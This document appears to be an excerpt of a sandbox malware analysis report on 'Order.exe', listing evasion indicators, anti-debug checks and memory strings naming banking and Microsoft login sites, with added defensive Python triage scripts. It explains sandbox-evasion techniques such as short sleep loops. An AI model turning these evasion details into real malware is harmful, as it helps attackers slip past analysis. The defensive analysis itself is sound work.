Source: 0.2.Order.exe.3b41da0.1.raw.unpack | High entropy of concatenated method names: the same 23 classes (LRToqTRMv79ZE70a2X.cs, gWrW1AMb5JSFn78s7W.cs, QH2qCN3DXJ76e9ZhjZ.cs, CcSwQRsFuLY5V9HHwb.cs, IFb9yXHQYsT6aGaYKe.cs, ct5GO8Sa4yp6boot2fh.cs, WOvEGlbFUFuoitoiSB.cs, DmlG0vuofs9SjDZNsk.cs, vLkQu0h9flEgOBwxpG.cs, DEcfA0tReK6vAshi84.cs, prCQ0nSTHWVoHsFE2hl.cs, GrbfCDO2Fb3aiPmKSc.cs, vr5o4TCnKABqtW5kUU.cs, wDVu3IFeNnoDIiIgEw.cs, MDbR9JXFa83jJGxJTI.cs, S0yPV81WU0AT3cSA2x.cs, CH8dJ1irwJ3NvXoVkm.cs, QIkfoDQ92Aa3eL9Mpc.cs, XTxC8FVy1NLH6R5H92.cs, g7UVknWmsuA9pOFpK5.cs, NIA8NLSSkVYIuvjbdU5.cs, Hhy3r4Sihn5qn2D1yYj.cs, SBFl3szAN9BIAopKeP.cs) with exactly the method names listed for 0.2.Order.exe.70a0000.3.raw.unpack above; the two dumps are evidently the same unpacked assembly recovered at two addresses.
Source: C:\Users\user\Desktop\Order.exe | Process information set: NOOPENFILEERRORBOX (37 occurrences)
Source: C:\Windows\SysWOW64\fc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)
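
The three static indicators in this section (a link timestamp decades in the future, a .text entropy of 7.97, and the push ...; ret/retf/iretd sequences) can be re-checked outside the sandbox. The script below is an added example written for this edit; it is neither Joe Sandbox code nor the sample's. It parses only the header fields it needs from a PE image, computes the Shannon entropy of a section, and scans raw bytes for a push immediately followed by a return-family opcode. The PE header and code bytes it runs on are constructed to carry the report's values (timestamp 0xA7A1B934 and the listed gadget bytes); on a real file, read the image with open(path, "rb") and slice .text out of the section table.

```python
"""Static triage for three indicators the Data Obfuscation section lists:
a compile timestamp in the future, near-maximal .text entropy, and
push ...; ret/retf/iretd sequences. Added example, not Joe Sandbox code."""
import math
import struct
from datetime import datetime, timezone

RET_OPCODES = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCA: "retf imm16", 0xCF: "iretd"}
ONE_BYTE_PUSH = {0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
                 0x60: "pushad", 0x9C: "pushfd"}
for _i, _reg in enumerate(("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")):
    ONE_BYTE_PUSH[0x50 + _i] = f"push {_reg}"


def pe_timestamp(image: bytes) -> int:
    """IMAGE_FILE_HEADER.TimeDateStamp of a PE image; raises ValueError if not a PE."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    # COFF header after the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", image, e_lfanew + 8)[0]


def timestamp_in_future(ts: int, now=None) -> bool:
    """True when the link time lies after `now` (default: current UTC time)."""
    now = now or datetime.now(timezone.utc)
    return datetime.fromtimestamp(ts, tz=timezone.utc) > now


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte, 0.0 to 8.0; packed or encrypted sections sit near the top."""
    if not buf:
        return 0.0
    n = len(buf)
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def find_push_ret(code: bytes, base: int = 0):
    """Return [(address, mnemonic)] for a push directly followed by ret/retf/iretd.
    In a high-entropy section most hits are packed data that happens to decode as
    code, so treat them as a packing indicator, not as proof of hand-written gadgets."""
    hits = []
    i = 0
    while i < len(code):
        op = code[i]
        if op == 0x68 and i + 5 < len(code) and code[i + 5] in RET_OPCODES:      # push imm32
            imm = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((base + i, f"push {imm:08X}h; {RET_OPCODES[code[i + 5]]}"))
            i += 6
        elif op == 0x6A and i + 2 < len(code) and code[i + 2] in RET_OPCODES:    # push imm8
            hits.append((base + i, f"push {code[i + 1]:08X}h; {RET_OPCODES[code[i + 2]]}"))
            i += 3
        elif op in ONE_BYTE_PUSH and i + 1 < len(code) and code[i + 1] in RET_OPCODES:
            hits.append((base + i, f"{ONE_BYTE_PUSH[op]}; {RET_OPCODES[code[i + 1]]}"))
            i += 2
        else:
            i += 1
    return hits


def build_sample_pe() -> bytes:
    """Constructed minimal PE header (not the real Order.exe) carrying the
    report's timestamp 0xA7A1B934."""
    hdr = bytearray(0x40 + 24)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                      # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHI", hdr, 0x44, 0x014C, 1, 0xA7A1B934)   # i386, 1 section, TimeDateStamp
    return bytes(hdr)


# Constructed code bytes mirroring sequences the report lists.
SAMPLE_CODE = (b"\x68\x93\x85\x02\x30\xCF"   # push 30028593h; iretd
               b"\x52\xCF"                   # push edx; iretd
               b"\x0E\xCF"                   # push cs; iretd
               b"\x90\x90\x90\x90"           # nop padding
               b"\x9C\xCF"                   # pushfd; iretd
               b"\x6A\x32\xC3")              # push 00000032h; ret


def triage(image: bytes, text_section: bytes, base: int = 0x401000) -> dict:
    """Combine the three checks into one report-style dict."""
    ts = pe_timestamp(image)
    return {
        "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(),
        "timestamp_in_future": timestamp_in_future(ts),
        "text_entropy": round(shannon_entropy(text_section), 3),
        "push_ret_sequences": find_push_ret(text_section, base),
    }


if __name__ == "__main__":
    for key, value in triage(build_sample_pe(), SAMPLE_CODE).items():
        print(f"{key}: {value}")
```

The entropy threshold worth alarming on depends on the section: 7.9+ in .text, as here, is compressed or encrypted code, whereas a resource section holding a PNG legitimately scores similarly. The gadget scan deliberately only matches adjacent pairs; a packed section produces plenty of them by accident, which is exactly why the sandbox lists them as an obfuscation indicator rather than as exploit code.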

                Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: Order.exe PID: 4540, type: MEMORYSTR
Source: C:\Windows\SysWOW64\fc.exe | API/Special instruction interceptor: Addresses: 7FFB2CECD324, 7FFB2CECD7E4, 7FFB2CECD944, 7FFB2CECD504, 7FFB2CECD544, 7FFB2CECD1E4, 7FFB2CED0154, 7FFB2CECDA44
Source: C:\Users\user\Desktop\Order.exe | Memory allocated (memory reserve, memory write watch): E70000, 2870000, 2790000, 7230000, 8230000, 83D0000, 93D0000
Note (added in editing): reserving with MEM_WRITE_WATCH is what the .NET CLR's garbage collector does for its heap segments, so on a managed executable such as Order.exe these allocations are expected and are not evidence of sandbox evasion on their own; the signal here comes from the other checks in this section.
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A0096E rdtsc (9_2_01A0096E)
Source: C:\Users\user\Desktop\Order.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\fc.exe | Window / User API: threadDelayed 9721
Source: C:\Users\user\Desktop\Order.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\fc.exe | API coverage: 2.7 %
Source: C:\Users\user\Desktop\Order.exe TID: 6880 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe TID: 4116 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\fc.exe TID: 2908 | Thread sleep count: 253 > 30
Source: C:\Windows\SysWOW64\fc.exe TID: 2908 | Thread sleep time: -506000s >= -30000s
Source: C:\Windows\SysWOW64\fc.exe TID: 2908 | Thread sleep count: 9721 > 30
Source: C:\Windows\SysWOW64\fc.exe TID: 2908 | Thread sleep time: -19442000s >= -30000s
Source: C:\Windows\SysWOW64\fc.exe | Last function: Thread delayed (2 occurrences)
Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0321C500 FindFirstFileW,FindNextFileW,FindClose (12_2_0321C500)
Source: C:\Users\user\Desktop\Order.exe | Thread delayed: delay time: 922337203685477
Note (added in editing): 922337203685477 is 2^63 × 100 ns expressed in milliseconds, i.e. an NtDelayExecution interval of INT64_MIN, which is how an infinite relative wait such as Sleep(INFINITE) reaches the kernel; one parked thread in Order.exe is a weak evasion signal by itself. The fc.exe thread 2908 pattern is the stronger one: 9721 delays of 2000 each (19442000 / 9721), a sleep loop that stalls analysis in steps small enough to pass under a per-call long-sleep threshold. The sandbox prints these values with an "s" suffix, but the 2000-per-call quotient makes milliseconds the plausible unit.
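
One way to implement the per-thread sleep accounting those lines reflect, as an added example that is not Joe Sandbox code: it normalises Sleep/SleepEx and NtDelayExecution arguments to milliseconds, then flags a single long sleep, a loop of many short sleeps whose total is large, and an infinite wait as three distinct findings. The (tid, api, argument) trace tuples, the thresholds and the sample trace are assumptions; the sample is constructed to mirror the report's numbers (9721 × 2000 ms on one thread, one 60000 ms sleep, and the INT64_MIN interval of a parked thread).

```python
"""Per-thread aggregation of delay calls, the rule behind "Thread sleep time ...
>= -30000s" and "Thread sleep count 9721 > 30" style findings.
Added example, not Joe Sandbox code; trace format and thresholds are assumed."""
from collections import defaultdict

LONG_SLEEP_MS = 30_000          # assumed: one sleep this long is flagged on its own
LOOP_MIN_CALLS = 30             # assumed: a loop needs at least this many delay calls
LOOP_TOTAL_MS = 60_000          # assumed: ...and at least this much accumulated delay
INFINITE_MS = 2**63 // 10_000   # NtDelayExecution interval INT64_MIN in ms: 922337203685477


def delay_ms(api: str, arg: str):
    """Normalise one traced call to milliseconds, or None if it is not a relative delay."""
    if api in ("Sleep", "SleepEx"):
        value = int(arg)                 # dwMilliseconds; 0xFFFFFFFF is INFINITE
        return INFINITE_MS if value == 0xFFFFFFFF else value
    if api == "NtDelayExecution":
        interval = int(arg)              # signed 100 ns units; negative means relative
        if interval >= 0:
            return None                  # absolute deadline, not a stall by itself
        return -interval // 10_000       # Sleep(INFINITE) arrives here as -2**63
    return None


def analyse(trace):
    """trace: iterable of (tid, api, arg). Returns {tid: stats + reasons} for flagged threads."""
    per_tid = defaultdict(lambda: {"calls": 0, "total_ms": 0, "max_ms": 0})
    for tid, api, arg in trace:
        ms = delay_ms(api, arg)
        if ms is None:
            continue
        stats = per_tid[tid]
        stats["calls"] += 1
        stats["total_ms"] += ms
        stats["max_ms"] = max(stats["max_ms"], ms)

    findings = {}
    for tid, stats in per_tid.items():
        reasons = []
        if stats["max_ms"] >= INFINITE_MS:
            reasons.append("infinite wait (parked thread; weak signal on its own)")
        elif stats["max_ms"] >= LONG_SLEEP_MS:
            reasons.append(f"single sleep of {stats['max_ms']} ms")
        if (stats["calls"] >= LOOP_MIN_CALLS and stats["total_ms"] >= LOOP_TOTAL_MS
                and stats["max_ms"] < LONG_SLEEP_MS):
            reasons.append(f"{stats['calls']} short sleeps totalling {stats['total_ms']} ms")
        if reasons:
            findings[tid] = {**stats, "reasons": reasons}
    return findings


def sample_trace():
    """Constructed trace shaped like the report: TID 2908 loops 9721 x 2000 ms,
    TID 4116 sleeps 60 s once, TID 6880 waits forever, TID 1234 is benign."""
    trace = [(2908, "Sleep", "2000")] * 9721
    trace.append((4116, "NtDelayExecution", str(-60_000 * 10_000)))
    trace.append((6880, "NtDelayExecution", str(-2**63)))
    trace += [(1234, "Sleep", "10")] * 5
    trace.append((1234, "CreateFileW", "C:\\tmp\\x"))   # non-delay call, ignored
    return trace


if __name__ == "__main__":
    for tid, finding in sorted(analyse(sample_trace()).items()):
        print(f"TID {tid}: {finding['reasons']}")
```

Scoring the loop on the accumulated total rather than on the per-call value is the point: each 2000 ms call is harmless in isolation, and a sandbox that only shortens individual long sleeps will still burn its whole analysis window on a thread like 2908.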
Source: 0349A-n.12.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 0349A-n.12.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 0349A-n.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 0349A-n.12.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 0349A-n.12.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 0349A-n.12.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 0349A-n.12.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 0349A-n.12.dr | Binary or memory string: AMC password management pageVMware20,11696492231
Source: 0349A-n.12.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 0349A-n.12.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3124458453.00000000005F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: 0349A-n.12.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 0349A-n.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 0349A-n.12.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 0349A-n.12.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 0349A-n.12.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 0349A-n.12.dr | Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 00000010.00000002.2135034194.0000018F3B06C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
Source: 0349A-n.12.dr | Binary or memory string: global block list test formVMware20,11696492231
Source: 0349A-n.12.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 0349A-n.12.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 0349A-n.12.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 0349A-n.12.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 0349A-n.12.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 0349A-n.12.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 0349A-n.12.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 0349A-n.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: fc.exe, 0000000C.00000002.3119481100.0000000003410000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: 0349A-n.12.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 0349A-n.12.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 0349A-n.12.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 0349A-n.12.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 0349A-n.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 0349A-n.12.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\Order.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A0096E rdtsc 9_2_01A0096E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_00417793 LdrLoadDll,9_2_00417793
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA197 mov eax, dword ptr fs:[00000030h]9_2_019BA197
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA197 mov eax, dword ptr fs:[00000030h]9_2_019BA197
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA197 mov eax, dword ptr fs:[00000030h]9_2_019BA197
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A00185 mov eax, dword ptr fs:[00000030h]9_2_01A00185
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A64180 mov eax, dword ptr fs:[00000030h]9_2_01A64180
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A64180 mov eax, dword ptr fs:[00000030h]9_2_01A64180
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7C188 mov eax, dword ptr fs:[00000030h]9_2_01A7C188
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7C188 mov eax, dword ptr fs:[00000030h]9_2_01A7C188
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4019F mov eax, dword ptr fs:[00000030h]9_2_01A4019F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4019F mov eax, dword ptr fs:[00000030h]9_2_01A4019F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4019F mov eax, dword ptr fs:[00000030h]9_2_01A4019F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A4019F mov eax, dword ptr fs:[00000030h]9_2_01A4019F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A961E5 mov eax, dword ptr fs:[00000030h]9_2_01A961E5
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F01F8 mov eax, dword ptr fs:[00000030h]9_2_019F01F8
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A861C3 mov eax, dword ptr fs:[00000030h]9_2_01A861C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A861C3 mov eax, dword ptr fs:[00000030h]9_2_01A861C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]9_2_01A3E1D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]9_2_01A3E1D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E1D0 mov ecx, dword ptr fs:[00000030h]9_2_01A3E1D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]9_2_01A3E1D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]9_2_01A3E1D0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov ecx, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov ecx, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov ecx, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov eax, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6E10E mov ecx, dword ptr fs:[00000030h]9_2_01A6E10E
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F0124 mov eax, dword ptr fs:[00000030h]9_2_019F0124
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A80115 mov eax, dword ptr fs:[00000030h]9_2_01A80115
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6A118 mov ecx, dword ptr fs:[00000030h]9_2_01A6A118
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6A118 mov eax, dword ptr fs:[00000030h]9_2_01A6A118
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6A118 mov eax, dword ptr fs:[00000030h]9_2_01A6A118
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6A118 mov eax, dword ptr fs:[00000030h]9_2_01A6A118
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C6154 mov eax, dword ptr fs:[00000030h]9_2_019C6154
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C6154 mov eax, dword ptr fs:[00000030h]9_2_019C6154
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BC156 mov eax, dword ptr fs:[00000030h]9_2_019BC156
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94164 mov eax, dword ptr fs:[00000030h]9_2_01A94164
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A94164 mov eax, dword ptr fs:[00000030h]9_2_01A94164
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A54144 mov eax, dword ptr fs:[00000030h]9_2_01A54144
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A54144 mov eax, dword ptr fs:[00000030h]9_2_01A54144
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A54144 mov ecx, dword ptr fs:[00000030h]9_2_01A54144
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A54144 mov eax, dword ptr fs:[00000030h]9_2_01A54144
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A54144 mov eax, dword ptr fs:[00000030h]9_2_01A54144
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A58158 mov eax, dword ptr fs:[00000030h]9_2_01A58158
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A580A8 mov eax, dword ptr fs:[00000030h]9_2_01A580A8
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A860B8 mov eax, dword ptr fs:[00000030h]9_2_01A860B8
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A860B8 mov ecx, dword ptr fs:[00000030h]9_2_01A860B8
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C208A mov eax, dword ptr fs:[00000030h]9_2_019C208A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B80A0 mov eax, dword ptr fs:[00000030h]9_2_019B80A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A460E0 mov eax, dword ptr fs:[00000030h]9_2_01A460E0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A020F0 mov ecx, dword ptr fs:[00000030h]9_2_01A020F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BC0F0 mov eax, dword ptr fs:[00000030h]9_2_019BC0F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C80E9 mov eax, dword ptr fs:[00000030h]9_2_019C80E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA0E3 mov ecx, dword ptr fs:[00000030h]9_2_019BA0E3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A420DE mov eax, dword ptr fs:[00000030h]9_2_01A420DE
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE016 mov eax, dword ptr fs:[00000030h]9_2_019DE016
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE016 mov eax, dword ptr fs:[00000030h]9_2_019DE016
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE016 mov eax, dword ptr fs:[00000030h]9_2_019DE016
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE016 mov eax, dword ptr fs:[00000030h]9_2_019DE016
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A56030 mov eax, dword ptr fs:[00000030h]9_2_01A56030
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A44000 mov ecx, dword ptr fs:[00000030h]9_2_01A44000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A62000 mov eax, dword ptr fs:[00000030h]9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BA020 mov eax, dword ptr fs:[00000030h]9_2_019BA020
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BC020 mov eax, dword ptr fs:[00000030h]9_2_019BC020
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C2050 mov eax, dword ptr fs:[00000030h]9_2_019C2050
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EC073 mov eax, dword ptr fs:[00000030h]9_2_019EC073
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A46050 mov eax, dword ptr fs:[00000030h]9_2_01A46050
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B8397 mov eax, dword ptr fs:[00000030h]9_2_019B8397
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B8397 mov eax, dword ptr fs:[00000030h]9_2_019B8397
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019B8397 mov eax, dword ptr fs:[00000030h]9_2_019B8397
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E438F mov eax, dword ptr fs:[00000030h]9_2_019E438F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019E438F mov eax, dword ptr fs:[00000030h]9_2_019E438F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BE388 mov eax, dword ptr fs:[00000030h]9_2_019BE388
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BE388 mov eax, dword ptr fs:[00000030h]9_2_019BE388
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BE388 mov eax, dword ptr fs:[00000030h]9_2_019BE388
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019CA3C0 mov eax, dword ptr fs:[00000030h]9_2_019CA3C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C83C0 mov eax, dword ptr fs:[00000030h]9_2_019C83C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C83C0 mov eax, dword ptr fs:[00000030h]9_2_019C83C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C83C0 mov eax, dword ptr fs:[00000030h]9_2_019C83C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C83C0 mov eax, dword ptr fs:[00000030h]9_2_019C83C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019F63FF mov eax, dword ptr fs:[00000030h]9_2_019F63FF
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A463C0 mov eax, dword ptr fs:[00000030h]9_2_01A463C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7C3CD mov eax, dword ptr fs:[00000030h]9_2_01A7C3CD
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE3F0 mov eax, dword ptr fs:[00000030h]9_2_019DE3F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE3F0 mov eax, dword ptr fs:[00000030h]9_2_019DE3F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DE3F0 mov eax, dword ptr fs:[00000030h]9_2_019DE3F0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A643D4 mov eax, dword ptr fs:[00000030h]9_2_01A643D4
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A643D4 mov eax, dword ptr fs:[00000030h]9_2_01A643D4
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D03E9 mov eax, dword ptr fs:[00000030h]9_2_019D03E9
